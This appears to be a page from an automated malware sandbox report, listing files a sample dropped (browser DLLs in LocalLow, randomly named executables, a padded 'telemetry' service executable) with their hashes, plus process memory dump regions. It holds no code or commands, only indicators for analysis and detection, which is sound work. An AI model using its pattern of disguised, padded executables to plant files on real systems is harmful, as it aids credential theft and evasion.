3f648b7c88b1e0195acad5ad194b59f5de8f2bf9179b2cc330d7ef1a028d48141541545b2354137a2ab0105e92fb75d9e0e11c9250ee1bcb7a4f472de3637a5d

Download Submit
C:\Users\Admin\AppData\LocalLow\mozglue.dll

Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
C:\Users\Admin\AppData\LocalLow\nss3.dll

Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
C:\Users\Admin\AppData\LocalLow\sqlite3.dll

Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3cf765d06965bb15d579485055099f7b

SHA1
66c23e263b149423c500cf50381e54c1158cd26f

SHA256
0647c2333e4d94df56b68ca1932e2a162ec3d541f2ba820714786f7ae6c459b7

SHA512
2199406fa16e3e8daf6fbbd7915a4500a1b45d4747d895755f2b0e72934018cdc7b82dc3c9fb9982e58f189635dde179d43e9649ea8a515c1da58b48781fba27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
569186bbafce4dc28604bda35b79b0d9

SHA1
6d1da1fb05a4447c105a3b7bd13a68ce4321c9da

SHA256
a8d08d1fade94672705d947b30870f420fa73bfd3d64d84c39ae3afdc589cccc

SHA512
4baff2dc239aec4c1b033bcbb16c1fbdfb2d303bc30d75f0f5862884020b258e8366fc91a9f35fb5cb3b5dcfa56b673ad1e714d7fe53284246110cb9cfa3fd82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b90662dc9d10118d77cd35122b559575

SHA1
f7721878ff33f44a394b700462ea322401be81d5

SHA256
69f60248458bfa002277555b14610ca2ee0192da9b9b94be28ef249825130c76

SHA512
125055671c476ee40e1d5fa1576f67a52120b33922c320ad49910980180ec895593fba15b79086881cf8076f7b9bb4ec9fe7ef513d1b93cafaedf859f8240b13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
dd354bd50c0325defff5aab15bf95e63

SHA1
55e8c8ae174346d731069784cb929e2fa45f0b44

SHA256
7cddec6d6c0356cd0e27ef93636632faaaf99cbc6d6ef3184f697d2e71c96bd7

SHA512
905bf4f67219040c72f59e6b92ba865a53b40e3fae5f01b08d3e4bf8444afda97d174a1996d1984cd9e90f95a1347880b4d06c6d7247b67a334652857d504f2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
dd354bd50c0325defff5aab15bf95e63

SHA1
55e8c8ae174346d731069784cb929e2fa45f0b44

SHA256
7cddec6d6c0356cd0e27ef93636632faaaf99cbc6d6ef3184f697d2e71c96bd7

SHA512
905bf4f67219040c72f59e6b92ba865a53b40e3fae5f01b08d3e4bf8444afda97d174a1996d1984cd9e90f95a1347880b4d06c6d7247b67a334652857d504f2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aclmmmwj.kyw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\1IchceUs.exe

Filesize
309KB

MD5
556695e9c3421bca48a6035290030974

SHA1
1befa908e188cefa9e487f1149f3ed06d20708e1

SHA256
fb5a4495ff5a622d64bcb90b7d65f6278e5e8c5e6c53589321b72454c7ced196

SHA512
617f666b89748c2b68f881f09b90da4992f11dadef873fd0f4211d2fc8a6f075ddf68b539e098ac8af438c8e76413a25937b610085162f90f8a162b7ed2bf256

Download Submit
C:\Users\Admin\AppData\Roaming\1IchceUs.exe

Filesize
309KB

MD5
556695e9c3421bca48a6035290030974

SHA1
1befa908e188cefa9e487f1149f3ed06d20708e1

SHA256
fb5a4495ff5a622d64bcb90b7d65f6278e5e8c5e6c53589321b72454c7ced196

SHA512
617f666b89748c2b68f881f09b90da4992f11dadef873fd0f4211d2fc8a6f075ddf68b539e098ac8af438c8e76413a25937b610085162f90f8a162b7ed2bf256

Download Submit
C:\Users\Admin\AppData\Roaming\1IchceUs.exe

Filesize
309KB

MD5
556695e9c3421bca48a6035290030974

SHA1
1befa908e188cefa9e487f1149f3ed06d20708e1

SHA256
fb5a4495ff5a622d64bcb90b7d65f6278e5e8c5e6c53589321b72454c7ced196

SHA512
617f666b89748c2b68f881f09b90da4992f11dadef873fd0f4211d2fc8a6f075ddf68b539e098ac8af438c8e76413a25937b610085162f90f8a162b7ed2bf256

Download Submit
C:\Users\Admin\AppData\Roaming\6O9zz3hP.exe

Filesize
48KB

MD5
a23629286d856fa79cdf0d0012746bd7

SHA1
f5879c4d4506f750fe2cc510c8aedf5a6db462d6

SHA256
b7ff7973cae49e3e8bafe21ee7b7c7a6b713c2893cefa844c5f4ff134403118a

SHA512
99ea72147871288d65bc817d960c42a1e3f64dc29f972dd094fbea2f3764cadbec6470efe1458844653f87fa8aff862e91b83cc4c84632f69b8fa5685f1c7cde

Download Submit
C:\Users\Admin\AppData\Roaming\6O9zz3hP.exe

Filesize
48KB

MD5
a23629286d856fa79cdf0d0012746bd7

SHA1
f5879c4d4506f750fe2cc510c8aedf5a6db462d6

SHA256
b7ff7973cae49e3e8bafe21ee7b7c7a6b713c2893cefa844c5f4ff134403118a

SHA512
99ea72147871288d65bc817d960c42a1e3f64dc29f972dd094fbea2f3764cadbec6470efe1458844653f87fa8aff862e91b83cc4c84632f69b8fa5685f1c7cde

Download Submit
C:\Users\Admin\AppData\Roaming\6O9zz3hP.exe

Filesize
48KB

MD5
a23629286d856fa79cdf0d0012746bd7

SHA1
f5879c4d4506f750fe2cc510c8aedf5a6db462d6

SHA256
b7ff7973cae49e3e8bafe21ee7b7c7a6b713c2893cefa844c5f4ff134403118a

SHA512
99ea72147871288d65bc817d960c42a1e3f64dc29f972dd094fbea2f3764cadbec6470efe1458844653f87fa8aff862e91b83cc4c84632f69b8fa5685f1c7cde

Download Submit
C:\Users\Admin\AppData\Roaming\smygFrE2.exe

Filesize
7.5MB

MD5
fb0deff37fe12bbc4f0c1fe21e2d15ef

SHA1
180325b8b6e64638e167601c67cd9c53331ba9f6

SHA256
ece100b8240f7eb032cb319a019eba1552ac19f563a291cf8422b1090ccf9b76

SHA512
9fc013111994e943fd800abeb543563713eebebcd940b28973809a40d85271f0ed781dd95ca508e55788de2e2a575b1cb8734636f15b51a9d68f773b2cb4e73d

Download Submit
C:\Users\Admin\AppData\Roaming\smygFrE2.exe

Filesize
7.5MB

MD5
fb0deff37fe12bbc4f0c1fe21e2d15ef

SHA1
180325b8b6e64638e167601c67cd9c53331ba9f6

SHA256
ece100b8240f7eb032cb319a019eba1552ac19f563a291cf8422b1090ccf9b76

SHA512
9fc013111994e943fd800abeb543563713eebebcd940b28973809a40d85271f0ed781dd95ca508e55788de2e2a575b1cb8734636f15b51a9d68f773b2cb4e73d

Download Submit
C:\Users\Admin\AppData\Roaming\smygFrE2.exe

Filesize
7.5MB

MD5
fb0deff37fe12bbc4f0c1fe21e2d15ef

SHA1
180325b8b6e64638e167601c67cd9c53331ba9f6

SHA256
ece100b8240f7eb032cb319a019eba1552ac19f563a291cf8422b1090ccf9b76

SHA512
9fc013111994e943fd800abeb543563713eebebcd940b28973809a40d85271f0ed781dd95ca508e55788de2e2a575b1cb8734636f15b51a9d68f773b2cb4e73d

Download Submit
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

Filesize
697.3MB

MD5
0140925c33a1aeb29aa156bf7c9f32ef

SHA1
3c7408c54de97b52a4e793ae7d43ae561609f4de

SHA256
a3456ec411889d9af689c1d953c85f34ae5e518e7b11c39be7a20fd11c727199

SHA512
58ae20fe3fbb2356ec5342abf6f954ff8584ef5073038c4515bfaf1fad7203a6ebf45ebf9888e5389a5ce08ca17bfd1fa5d062709ad8d0c4d8dc2289c97d7c4a

Download Submit
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

Filesize
694.1MB

MD5
483f09aedf4f4ffa0a2d861902e2acb5

SHA1
ea059e1315f65adb75551cbc4253ba0ea408ba9f

SHA256
08fcea6fe28b879a4183ab5b2870513ddb5bf9751842e5221bf4b4a5a1951a2e

SHA512
5dc30efc94b4d6917fbce966ae3d73316a2a75503b35caa88544d639ed0d7cd819a8bf355137e8604d3993fffdf31966bc045e78d336f6e5733b35a1d762321e

Download Submit
memory/648-295-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/648-233-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/648-226-0x0000000004C40000-0x0000000004CD2000-memory.dmp

Filesize
584KB

Download
memory/648-225-0x0000000005150000-0x00000000056F4000-memory.dmp

Filesize
5.6MB

Download
memory/648-224-0x0000000000330000-0x0000000000342000-memory.dmp

Filesize
72KB

Download
memory/648-244-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/648-302-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/1048-376-0x000000006F710000-0x000000006F75C000-memory.dmp

Filesize
304KB

Download
memory/1048-333-0x0000000004F80000-0x0000000004F90000-memory.dmp

Filesize
64KB

Download
memory/1048-372-0x0000000004F80000-0x0000000004F90000-memory.dmp

Filesize
64KB

Download
memory/1048-446-0x0000000004F80000-0x0000000004F90000-memory.dmp

Filesize
64KB

Download
memory/1048-334-0x0000000004F80000-0x0000000004F90000-memory.dmp

Filesize
64KB

Download
memory/1048-447-0x0000000004F80000-0x0000000004F90000-memory.dmp

Filesize
64KB

Download
memory/1048-427-0x000000007F400000-0x000000007F410000-memory.dmp

Filesize
64KB

Download
memory/1572-373-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/1572-339-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/1572-448-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/1572-377-0x000000006F710000-0x000000006F75C000-memory.dmp

Filesize
304KB

Download
memory/1572-449-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/1708-343-0x0000000004770000-0x0000000004780000-memory.dmp

Filesize
64KB

Download
memory/1708-428-0x000000007FCA0000-0x000000007FCB0000-memory.dmp

Filesize
64KB

Download
memory/1708-396-0x000000006F710000-0x000000006F75C000-memory.dmp

Filesize
304KB

Download
memory/1708-374-0x0000000004770000-0x0000000004780000-memory.dmp

Filesize
64KB

Download
memory/1876-245-0x0000000001200000-0x0000000001201000-memory.dmp

Filesize
4KB

Download
memory/1876-252-0x0000000002E80000-0x0000000002E81000-memory.dmp

Filesize
4KB

Download
memory/1876-247-0x0000000001220000-0x0000000001221000-memory.dmp

Filesize
4KB

Download
memory/1876-246-0x0000000001210000-0x0000000001211000-memory.dmp

Filesize
4KB

Download
memory/1876-249-0x0000000002E50000-0x0000000002E51000-memory.dmp

Filesize
4KB

Download
memory/1876-248-0x0000000002E40000-0x0000000002E41000-memory.dmp

Filesize
4KB

Download
memory/1876-251-0x0000000002E70000-0x0000000002E71000-memory.dmp

Filesize
4KB

Download
memory/1876-250-0x0000000002E60000-0x0000000002E61000-memory.dmp

Filesize
4KB

Download
memory/1876-253-0x0000000000260000-0x0000000000E0B000-memory.dmp

Filesize
11.7MB

Download
memory/2160-416-0x000000006F710000-0x000000006F75C000-memory.dmp

Filesize
304KB

Download
memory/2160-340-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/2160-430-0x000000007F8E0000-0x000000007F8F0000-memory.dmp

Filesize
64KB

Download
memory/2160-341-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/2160-375-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/2160-450-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/2160-452-0x0000000002E70000-0x0000000002E80000-memory.dmp

Filesize
64KB

Download
memory/2960-397-0x000000006F710000-0x000000006F75C000-memory.dmp

Filesize
304KB

Download
memory/2960-342-0x0000000002B20000-0x0000000002B30000-memory.dmp

Filesize
64KB

Download
memory/2960-456-0x0000000002B20000-0x0000000002B30000-memory.dmp

Filesize
64KB

Download
memory/2960-455-0x0000000002B20000-0x0000000002B30000-memory.dmp

Filesize
64KB

Download
memory/2960-426-0x0000000002B20000-0x0000000002B30000-memory.dmp

Filesize
64KB

Download
memory/2960-429-0x000000007EEA0000-0x000000007EEB0000-memory.dmp

Filesize
64KB

Download
memory/3556-317-0x0000000007670000-0x0000000007680000-memory.dmp

Filesize
64KB

Download
memory/3556-315-0x00000000007A0000-0x00000000007B6000-memory.dmp

Filesize
88KB

Download
memory/3556-442-0x0000000007670000-0x0000000007680000-memory.dmp

Filesize
64KB

Download
memory/3948-437-0x0000000001AB0000-0x0000000001AB1000-memory.dmp

Filesize
4KB

Download
memory/3948-434-0x00000000018E0000-0x00000000018E1000-memory.dmp

Filesize
4KB

Download
memory/3948-441-0x0000000003390000-0x0000000003391000-memory.dmp

Filesize
4KB

Download
memory/3948-440-0x0000000003380000-0x0000000003381000-memory.dmp

Filesize
4KB

Download
memory/3948-443-0x0000000000930000-0x00000000014DB000-memory.dmp

Filesize
11.7MB

Download
memory/3948-439-0x0000000003370000-0x0000000003371000-memory.dmp

Filesize
4KB

Download
memory/3948-438-0x0000000003360000-0x0000000003361000-memory.dmp

Filesize
4KB

Download
memory/3948-435-0x0000000001A80000-0x0000000001A81000-memory.dmp

Filesize
4KB

Download
memory/3948-436-0x0000000001A90000-0x0000000001A91000-memory.dmp

Filesize
4KB

Download
memory/4496-229-0x0000000007490000-0x00000000074F6000-memory.dmp

Filesize
408KB

Download
memory/4496-294-0x0000000007670000-0x0000000007680000-memory.dmp

Filesize
64KB

Download
memory/4496-232-0x0000000007670000-0x0000000007680000-memory.dmp

Filesize
64KB

Download
memory/4496-227-0x0000000007300000-0x000000000730A000-memory.dmp

Filesize
40KB

Download
memory/4496-208-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/4604-284-0x0000000006990000-0x00000000069AE000-memory.dmp

Filesize
120KB

Download
memory/4604-286-0x0000000007D20000-0x000000000839A000-memory.dmp

Filesize
6.5MB

Download
memory/4604-258-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/4604-256-0x0000000002DE0000-0x0000000002E16000-memory.dmp

Filesize
216KB

Download
memory/4604-259-0x00000000056F0000-0x0000000005D18000-memory.dmp

Filesize
6.2MB

Download
memory/4604-299-0x0000000007960000-0x0000000007968000-memory.dmp

Filesize
32KB

Download
memory/4604-260-0x0000000005600000-0x0000000005622000-memory.dmp

Filesize
136KB

Download
memory/4604-261-0x0000000005D20000-0x0000000005D86000-memory.dmp

Filesize
408KB

Download
memory/4604-271-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/4604-272-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/4604-273-0x00000000069B0000-0x00000000069E2000-memory.dmp

Filesize
200KB

Download
memory/4604-274-0x0000000073830000-0x000000007387C000-memory.dmp

Filesize
304KB

Download
memory/4604-285-0x000000007F0F0000-0x000000007F100000-memory.dmp

Filesize
64KB

Download
memory/4604-257-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/4604-287-0x00000000076E0000-0x00000000076FA000-memory.dmp

Filesize
104KB

Download
memory/4604-291-0x0000000007750000-0x000000000775A000-memory.dmp

Filesize
40KB

Download
memory/4604-292-0x0000000007970000-0x0000000007A06000-memory.dmp

Filesize
600KB

Download
memory/4604-297-0x0000000007920000-0x000000000792E000-memory.dmp

Filesize
56KB

Download
memory/4604-298-0x0000000007A10000-0x0000000007A2A000-memory.dmp

Filesize
104KB

Download
memory/4996-140-0x0000000000400000-0x00000000015C3000-memory.dmp

Filesize
17.8MB

Download
memory/4996-139-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/4996-138-0x0000000003330000-0x0000000003331000-memory.dmp

Filesize
4KB

Download
memory/4996-186-0x0000000061E00000-0x0000000061EF1000-memory.dmp

Filesize
964KB

Download
memory/4996-137-0x0000000003320000-0x0000000003321000-memory.dmp

Filesize
4KB

Download
memory/4996-136-0x0000000003310000-0x0000000003311000-memory.dmp

Filesize
4KB

Download
memory/4996-135-0x00000000032F0000-0x00000000032F1000-memory.dmp

Filesize
4KB

Download
memory/4996-133-0x00000000031D0000-0x00000000031D1000-memory.dmp

Filesize
4KB

Download
memory/4996-134-0x00000000032E0000-0x00000000032E1000-memory.dmp

Filesize
4KB

Download